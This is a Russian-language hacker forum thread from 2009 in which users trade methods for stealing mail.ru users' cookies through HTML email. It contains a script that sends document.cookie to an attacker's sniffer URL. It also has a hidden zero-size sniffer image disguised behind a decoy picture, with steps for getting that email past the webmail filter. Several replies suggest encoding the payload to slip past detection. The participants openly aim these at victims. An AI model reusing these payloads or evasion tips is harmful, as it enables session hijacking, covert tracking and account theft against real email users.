Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   Потенциально опасный HTML-код (https://forum.antichat.xyz/showthread.php?t=121466)

LemoTTT 20.05.2009 01:07
Потенциально опасный HTML-код
 
Проблема в слудюещем:
Я отправляю на почту жертвы (mail.ru) HTML-файл, в котором размещен скрипт для кражи куки
Код HTML:
<script>img = new Image(); img.src = "http://путь к снифферу"+document.cookie;</script>
и когда жертва открывает письмо, то видит следующее:
http://pic.ipicture.ru/uploads/09052...2UdqBz5DRB.jpg
И резко передумывает открывать HTML-файл, как мне избежать этой красной предупредительной надписи?

Micr0b 20.05.2009 01:15
а как ты думаеш? ето и есть уже защита mail.ru
толк разришать уязвимость им нет.

diznt 20.05.2009 02:26
шифруй
правда может быть все шифровки они пропалили на маиле

LemoTTT 20.05.2009 15:47
Кто то может ответить навернека что конкретно и ка нужно сделать, и не флудить!
ЗЫ:
2 diznt
ссылка на сниффер закодирована!

heretic1990 20.05.2009 22:07
они javaScript блокируют!

Huster 20.05.2009 22:34
На mail.ru ничего не сделаеш. Там защита и ее х*й обойдеш. Или мирись с этой табличкой или отправляй на другое мыло :)

rezwii 21.05.2009 09:38
эту защиту несколько дней назад только поставили, до этого все отправлялось, только тогда все в новом окне открывалось. если раньше как то обходили то и сейчас можно, вопрос времени.

timeR 21.05.2009 22:16
есть у меня система одна но она вроде куки не ворует но на лог рефер выводит, + все происходит когда жертва открывает письмо мб кому пригодится,
(только репу не понижать если х%р%ю напишу хD)

PHP код:
//в имаге сорс устанавливаем путь к картинке сниффера    <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:0px; height:0px; z-index:0"><img src="http://*****/sniff/s.gif?id=1728&"+document.cookie; border=0 width=0 height=0></div>    //в имаге сорс устанавливаем путь к картинке обычной    <div id="image2" style="position:absolute; overflow:hidden; left:0px; top:0px; width:100px; height:100px; z-index:1"><img src="http://*****/img/ganibal.jpg" border=0 width=100 height=100></div> 
+пишем письмо в "обычном режиме" жмем расширенный, отправляем письмо в черновик, пишим кому, пишим тему, отправляем.

самое интересное что этот хтмл код не фильтруется, в итоге жертве приходит письмо с картинкой, в моем случае это был ганибал (100x100) как вы поняли, жертва видит картинку и лог у нас уже на сниффе, почему нужна картинка?

ибо если мы пошлем только картинку от снифа то чаще всего ее не видно а видно рамку изображения, что есстественно напугает "дичь", а так все красиво все рульно, можете еще оформить для красоты )

Ворует ли куки?

Нет, но можно попытатся замутить ченить.

а джава причем? если даже хреф ссылки иногда блокирует

у меня опера, мозила, ие )

LemoTTT 21.05.2009 23:05
не фильтрует, потому что там нет джавы!!!
ЗЫ: у тя опера?

brain[pillow] 22.05.2009 00:44
Что-то все жгут в данном топике. Всё просто - нет активной xss, знач не видать вам яваскрипта и не видать куков. Такой код мог не блочиться только наверное в первый месяц появления mail.ru, он примитивный и сейчас каждый почтовик его будет блочить. Не знаю как раньше вообще такой код мог проходить фильтр.


Время: 15:15
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице